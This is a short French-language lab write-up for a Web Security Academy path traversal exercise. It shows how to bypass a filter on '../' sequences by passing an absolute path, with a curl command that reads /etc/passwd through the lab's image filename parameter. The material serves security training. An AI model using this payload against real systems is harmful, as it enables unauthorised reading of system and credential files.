Path traversal avec contournement absolu lorsque les séquences sont bloquées

File path traversal, traversal sequences blocked with absolute path bypass

Lab: File path traversal, traversal sequences blocked with absolute path bypass | Web Security AcademyWebSecAcademy

L’application bloque les séquences de traversée (../), mais traite le nom de fichier fourni comme étant relatif à un répertoire de travail par défaut.

Pour résoudre le lab, il suffit de récupérer le contenu du fichier /etc/passwd.

Comme les séquences de traversée sont filtrées, on peut contourner le mécanisme en indiquant directement un chemin absolu :

/etc/passwd

Exemple avec curl :

curl 'https://0ac400440477a34780513f2a000f00a1.web-security-academy.net/image?filename=/etc/passwd'

Mis à jour il y a 1 jour

Ce contenu vous a-t-il été utile ?